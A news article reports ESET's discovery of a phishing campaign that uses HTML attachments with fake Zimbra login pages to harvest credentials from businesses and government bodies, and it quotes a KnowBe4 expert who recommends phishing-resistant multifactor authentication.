Security researchers at ESET s.r.o. today warned of a new mass-spreading phishing campaign actively targeting Zimbra account user credentials.

First detected in April, the ongoing campaign is targeting a variety of small and medium businesses and governmental entities. The largest number of targets recorded so far have been among users in Poland, but other European and Latin American countries have also been targeted, including Ukraine, Italy, France and Ecuador.

Although the researchers note that the campaign itself is not particularly technically sophisticated, it can still spread and compromise organizations that use Zimbra Collaboration, a software suite that includes an email server and web client.

The group behind the campaign sends emails to potential victims, including a phishing page in an attached HTML file. The emails warn the potential victim about an email server update, account deactivation or similar issue and direct the user to click on the attached file.

After clicking on the attachment, the user is taken to a fake Zimbra login page customized according to the targeted organization. The fake login page harvests submitted credentials entered by a victim who had been tricked to this point, sending them back to a service controlled by the attacks.

“Adversaries leverage the fact that HTML attachments contain legitimate code, with the only telltale element being a link pointing to the malicious host,” explained ESET researcher Viktor Šperka, who discovered the campaign. “In this manner, it is much easier to circumvent reputation-based anti-spam policies, especially compared with more prevalent phishing techniques, where a malicious link is directly placed in the email body.”

With those credentials, the attackers then infiltrate the affected account. In the cases where they have compromised an administrator account, they create new mailboxes that are used to send new phishing emails to other targets.

“What’s interesting to me is that previous commenters are saying this isn’t a sophisticated phishing campaign,” Roger Grimes, data-driven defense evangelist at cybersecurity company KnowBe4 Inc., told SiliconANGLE. “The initial phishing email redirects potential victims to a fake login page that contains their company’s logo and name. Both of these items significantly increase the chances that potential victims will be fooled and provide login credentials. I’m not sure this is the most sophisticated phishing campaign ever, but it’s not an unsophisticated one either.”

Grimes added that those using Zimbra must start taking their security seriously. “Step one is enabling phishing-resistant multifactor authentication on all Zimbra users and admins,” Grimes recommended. “If that had been done, these accounts, some of them admin, would not have been taken over by this latest phishing campaign.”

Image: Zimbra